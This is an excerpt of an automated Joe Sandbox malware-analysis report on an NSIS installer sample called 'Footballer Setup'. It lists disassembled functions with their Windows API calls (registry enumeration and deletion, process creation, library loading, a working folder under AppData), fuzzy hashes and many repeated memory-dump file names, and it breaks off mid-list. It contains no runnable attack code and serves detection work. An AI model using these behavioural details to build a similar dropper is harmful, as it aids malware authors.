Associated: 00000000.00000002.3698803700.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3699001436.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Awb 4586109146.jbxd

Similarity

API ID: CloseValuelstrlen
String ID: C:\Users\user\AppData\Local\Temp\nscEFD5.tmp
API String ID: 2655323295-1665735499
Opcode ID: 9f44fae4feaf80abe13c7d1901b8792fbf05e0e188fbec8c03c8727959a673d1
Instruction ID: 076fdad28fc4eb621c0ae83062707e46e05f76c541c0890e85279b1380dde0ba
Opcode Fuzzy Hash: 9f44fae4feaf80abe13c7d1901b8792fbf05e0e188fbec8c03c8727959a673d1
Instruction Fuzzy Hash: F1118471D00108BEEB10AFA5DE89EAEBA74EB44754F15803BF504F71D1DBB48D409B28

Function 00402D44 Relevance: 6.1, APIs: 4, Instructions: 63registryCOMMON

Download Yara Rule

APIs

RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402DA9
RegCloseKey.ADVAPI32(?,?,?), ref: 00402DB2
RegCloseKey.ADVAPI32(?,?,?), ref: 00402DD3

Memory Dump Source

Source File: 00000000.00000002.3698763362.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3698743809.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698783736.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3699001436.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Awb 4586109146.jbxd

Similarity

API ID: Close$Enum
String ID:
API String ID: 464197530-0
Opcode ID: a4e23b119c2c64eb18a4fa0724f9b8d9fe0ec592ff9815e45bdb7592abe1cef3
Instruction ID: fc7ade2e12cd9e993d25f9a328d8db16c9603ee1eb20de8c24b8f84b94a82c23
Opcode Fuzzy Hash: a4e23b119c2c64eb18a4fa0724f9b8d9fe0ec592ff9815e45bdb7592abe1cef3
Instruction Fuzzy Hash: B4116A32500109FBDF02AB90CE09FEE7B7DAF54340F100076B904B51E1E7B59E21AB68

Function 004015C1 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 65COMMON

Download Yara Rule

APIs

Part of subcall function 00405C3A: CharNextW.USER32(?,?,C:\,?,00405CAE,C:\,C:\,?,?,75573420,004059EC,?,C:\Users\user\AppData\Local\Temp\,75573420,00000000), ref: 00405C48
Part of subcall function 00405C3A: CharNextW.USER32(00000000), ref: 00405C4D
Part of subcall function 00405C3A: CharNextW.USER32(00000000), ref: 00405C65

GetFileAttributesW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 0040161A

Part of subcall function 004057F1: CreateDirectoryW.KERNELBASE(?,?,00000000), ref: 00405834

SetCurrentDirectoryW.KERNELBASE(?,C:\Users\user\AppData\Local\sillinesses,?,00000000,000000F0), ref: 0040164D

Strings

C:\Users\user\AppData\Local\sillinesses, xrefs: 00401640

Memory Dump Source

Source File: 00000000.00000002.3698763362.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3698743809.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698783736.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3699001436.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Awb 4586109146.jbxd

Similarity

API ID: CharNext$Directory$AttributesCreateCurrentFile
String ID: C:\Users\user\AppData\Local\sillinesses
API String ID: 1892508949-3064817632
Opcode ID: 1db21258f9f14eeaa58e626a3877af1e49894c045ef04388b0de34e33f5ae299
Instruction ID: 4927223e19ece6e176e0ab471dddb7e32c8def581d8881840bcbc1854d235eeb
Opcode Fuzzy Hash: 1db21258f9f14eeaa58e626a3877af1e49894c045ef04388b0de34e33f5ae299
Instruction Fuzzy Hash: 9711E231504505EBCF30AFA1CD0159F36A0EF14369B29493BFA45B22F1DB3E89519B5E

Function 00405C97 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 47stringCOMMON

Download Yara Rule

APIs

Part of subcall function 004062BA: lstrcpynW.KERNEL32(?,?,00000400,00403460,Footballer Setup,NSIS Error,?,00000006,00000008,0000000A), ref: 004062C7

Part of subcall function 00405C3A: CharNextW.USER32(?,?,C:\,?,00405CAE,C:\,C:\,?,?,75573420,004059EC,?,C:\Users\user\AppData\Local\Temp\,75573420,00000000), ref: 00405C48
Part of subcall function 00405C3A: CharNextW.USER32(00000000), ref: 00405C4D
Part of subcall function 00405C3A: CharNextW.USER32(00000000), ref: 00405C65

lstrlenW.KERNEL32(C:\,00000000,C:\,C:\,?,?,75573420,004059EC,?,C:\Users\user\AppData\Local\Temp\,75573420,00000000), ref: 00405CF0
GetFileAttributesW.KERNELBASE(C:\,C:\,C:\,C:\,C:\,C:\,00000000,C:\,C:\,?,?,75573420,004059EC,?,C:\Users\user\AppData\Local\Temp\,75573420), ref: 00405D00

Strings

C:\, xrefs: 00405C9D, 00405CA2, 00405CA8, 00405CE9, 00405CEF, 00405CF7, 00405CFF

Memory Dump Source

Source File: 00000000.00000002.3698763362.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3698743809.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698783736.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3699001436.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Awb 4586109146.jbxd

Similarity

API ID: CharNext$AttributesFilelstrcpynlstrlen
String ID: C:\
API String ID: 3248276644-3404278061
Opcode ID: 9cc0d29f879c40394f09ec61343d80eeaf68cc1a92588db26b65915d11595f82
Instruction ID: afdd3353ca4dad18281e5c0e52e07b41dda899da8cc80c7b0a0d0babdec36168
Opcode Fuzzy Hash: 9cc0d29f879c40394f09ec61343d80eeaf68cc1a92588db26b65915d11595f82
Instruction Fuzzy Hash: 87F0443100DF2225F622333A0C05AAF2554DE82328BAA053FFC52B12D2DA3C88138D7E

Function 00406188 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44registryCOMMON

Download Yara Rule

APIs

RegQueryValueExW.KERNELBASE(?,?,00000000,00000000,?,00000800,00000002,?,00000000,?,?,Call,?,?,004063FC,80000002), ref: 004061CE
RegCloseKey.KERNELBASE(?,?,004063FC,80000002,Software\Microsoft\Windows\CurrentVersion,Call,Call,Call,00000000,Skipped: C:\Users\user\AppData\Local\Temp\nscEFD5.tmp\System.dll), ref: 004061D9

Strings

Call, xrefs: 0040618F

Memory Dump Source

Source File: 00000000.00000002.3698763362.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3698743809.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698783736.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3699001436.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Awb 4586109146.jbxd

Similarity

API ID: CloseQueryValue
String ID: Call
API String ID: 3356406503-1824292864
Opcode ID: c86c14991d827863ed80974af0b6eb11eee99485bcf286d774b2a77da772c934
Instruction ID: dbe656cbcd6f76d760dfbfd9a3b1c67a2d3549b4381969b9bec3f5648691b042
Opcode Fuzzy Hash: c86c14991d827863ed80974af0b6eb11eee99485bcf286d774b2a77da772c934
Instruction Fuzzy Hash: 22017C72500209EADF218F51CD09EDB3BA8EB55364F01803AFD16A61A1D778D964EBA4

Function 004058A3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24processCOMMON

Download Yara Rule

APIs

CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00430250,Error launching installer), ref: 004058CC
CloseHandle.KERNEL32(?), ref: 004058D9

Strings

Error launching installer, xrefs: 004058B6

Memory Dump Source

Source File: 00000000.00000002.3698763362.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3698743809.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698783736.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3699001436.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Awb 4586109146.jbxd

Similarity

API ID: CloseCreateHandleProcess
String ID: Error launching installer
API String ID: 3712363035-66219284
Opcode ID: 26b27946013451d7cc559816144a6cf351020ce627575371dc693c6ec487af4b
Instruction ID: eef1ad79794a30a774d0e472c728ed5028324d39c85b098150df6d3db2f5c38f
Opcode Fuzzy Hash: 26b27946013451d7cc559816144a6cf351020ce627575371dc693c6ec487af4b
Instruction Fuzzy Hash: 93E092B5600209BFEB00AB64ED49F7BBBACEB04704F508565BD51F2290D778EC148A78

Function 00402032 Relevance: 4.6, APIs: 3, Instructions: 73libraryCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNELBASE(00000000,?,000000F0), ref: 0040205D

Part of subcall function 00405322: lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nscEFD5.tmp\System.dll,00000000,0041C000,755723A0,?,?,?,?,?,?,?,?,?,0040327A,00000000,?), ref: 0040535A
Part of subcall function 00405322: lstrlenW.KERNEL32(0040327A,Skipped: C:\Users\user\AppData\Local\Temp\nscEFD5.tmp\System.dll,00000000,0041C000,755723A0,?,?,?,?,?,?,?,?,?,0040327A,00000000), ref: 0040536A
Part of subcall function 00405322: lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nscEFD5.tmp\System.dll,0040327A,0040327A,Skipped: C:\Users\user\AppData\Local\Temp\nscEFD5.tmp\System.dll,00000000,0041C000,755723A0), ref: 0040537D
Part of subcall function 00405322: SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nscEFD5.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nscEFD5.tmp\System.dll), ref: 0040538F
Part of subcall function 00405322: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004053B5
Part of subcall function 00405322: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004053CF
Part of subcall function 00405322: SendMessageW.USER32(?,00001013,?,00000000), ref: 004053DD

LoadLibraryExW.KERNEL32(00000000,?,00000008,?,000000F0), ref: 0040206E
FreeLibrary.KERNELBASE(?,?,000000F7,?,?,00000008,?,000000F0), ref: 004020EB

Memory Dump Source

Source File: 00000000.00000002.3698763362.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3698743809.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698783736.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3699001436.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Awb 4586109146.jbxd

Similarity

API ID: MessageSend$Librarylstrlen$FreeHandleLoadModuleTextWindowlstrcat
String ID:
API String ID: 334405425-0
Opcode ID: feecde648e4e86c349c2181d42606f42c320c3d08ea0eac6231e50817e8518ef
Instruction ID: 732860e23109d101385e559ec06a1cde6071cd761d8e517fa4c79c7f2b675a05
Opcode Fuzzy Hash: feecde648e4e86c349c2181d42606f42c320c3d08ea0eac6231e50817e8518ef
Instruction Fuzzy Hash: 4421B031D00205EACF20AFA5CE48A9E7A70BF04358F64413BF511B51E0DBBD8981DA6E

Function 00402259 Relevance: 4.6, APIs: 3, Instructions: 51stringCOMMON

Download Yara Rule

APIs

Part of subcall function 004065FD: FindFirstFileW.KERNELBASE(?,00430298,C:\,00405CE0,C:\,C:\,00000000,C:\,C:\,?,?,75573420,004059EC,?,C:\Users\user\AppData\Local\Temp\,75573420), ref: 00406608
Part of subcall function 004065FD: FindClose.KERNEL32(00000000), ref: 00406614

lstrlenW.KERNEL32 ref: 00402299
lstrlenW.KERNEL32(00000000), ref: 004022A4
SHFileOperationW.SHELL32(?,?,?,00000000), ref: 004022CD

Memory Dump Source

Source File: 00000000.00000002.3698763362.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3698743809.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698783736.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3699001436.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Awb 4586109146.jbxd

Similarity

API ID: FileFindlstrlen$CloseFirstOperation
String ID:
API String ID: 1486964399-0
Opcode ID: 0e8315648e58b55814dc1f3c3dc6ef8becddff2acbdba340bf6f834892e6ac0b
Instruction ID: 6269ee181bc4fdd248ee35923937f3e1ab67e15396db9274ddd7ede6479e46a9
Opcode Fuzzy Hash: 0e8315648e58b55814dc1f3c3dc6ef8becddff2acbdba340bf6f834892e6ac0b
Instruction Fuzzy Hash: 44117071900318A6DB10EFF98E4999EB6B8AF04354F54443FB805F72D1D6B8C4419B59

Function 004024F8 Relevance: 4.5, APIs: 3, Instructions: 47registryCOMMON

Download Yara Rule

APIs

RegEnumKeyW.ADVAPI32(00000000,00000000,?,000003FF), ref: 0040252B
RegEnumValueW.ADVAPI32(00000000,00000000,?,?), ref: 0040253E
RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nscEFD5.tmp,00000000,00000011,00000002), ref: 00402557

Memory Dump Source

Source File: 00000000.00000002.3698763362.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3698743809.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698783736.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3699001436.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Awb 4586109146.jbxd

Similarity

API ID: Enum$CloseValue
String ID:
API String ID: 397863658-0
Opcode ID: 5a9a61952417b6bfe6b89a24e65653c5098fd890d3eefb72e287b860fa7248b6
Instruction ID: be079dd98ee366e8112d1373a1392f52e75f7f4d5f65991111ca301d6a19f001
Opcode Fuzzy Hash: 5a9a61952417b6bfe6b89a24e65653c5098fd890d3eefb72e287b860fa7248b6
Instruction Fuzzy Hash: 4E018471904204BFEB149F95DE88ABF7ABCEF80358F14403EF505B61D0DAB85E419B69

Function 00402484 Relevance: 3.1, APIs: 2, Instructions: 56registryCOMMON

Download Yara Rule

APIs

RegQueryValueExW.ADVAPI32(00000000,00000000,?,?,?,?), ref: 004024B5
RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nscEFD5.tmp,00000000,00000011,00000002), ref: 00402557

Memory Dump Source

Source File: 00000000.00000002.3698763362.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3698743809.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698783736.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3699001436.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Awb 4586109146.jbxd

Similarity

API ID: CloseQueryValue
String ID:
API String ID: 3356406503-0
Opcode ID: 30a88777c351d87c576ad82697aa8c74236b6c04a157dfa6a484cb743da54f5e
Instruction ID: 794a7caf9ed311c3342b46d24488b6d71e3894ac8d4f1441d9e09f9d9ce2e922
Opcode Fuzzy Hash: 30a88777c351d87c576ad82697aa8c74236b6c04a157dfa6a484cb743da54f5e
Instruction Fuzzy Hash: A411A731D14205EBDF14DFA4CA585AE77B4EF44348F21843FE445B72C0D6B89A41EB59

Function 00401389 Relevance: 3.0, APIs: 2, Instructions: 43windowCOMMON

Download Yara Rule

APIs

MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
SendMessageW.USER32(00000402,00000402,00000000), ref: 004013F4

Memory Dump Source

Source File: 00000000.00000002.3698763362.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3698743809.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698783736.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3699001436.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Awb 4586109146.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 819fad79445c3595f7b9f28f54206bfd84f40695cc559c75429dbb5a445ae89f
Instruction ID: eaafb4699c1cdf5c6f59fde68eca766a765a16907ebce13606274643e5ac5f14
Opcode Fuzzy Hash: 819fad79445c3595f7b9f28f54206bfd84f40695cc559c75429dbb5a445ae89f
Instruction Fuzzy Hash: 8D0128316242209FE7095B789D05B6A3698E710715F14463FF851F62F1D678CC429B4C

Function 0040238E Relevance: 3.0, APIs: 2, Instructions: 39registryCOMMON

Download Yara Rule

APIs

RegDeleteValueW.ADVAPI32(00000000,00000000,00000033), ref: 004023B0
RegCloseKey.ADVAPI32(00000000), ref: 004023B9

Memory Dump Source

Source File: 00000000.00000002.3698763362.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3698743809.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698783736.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
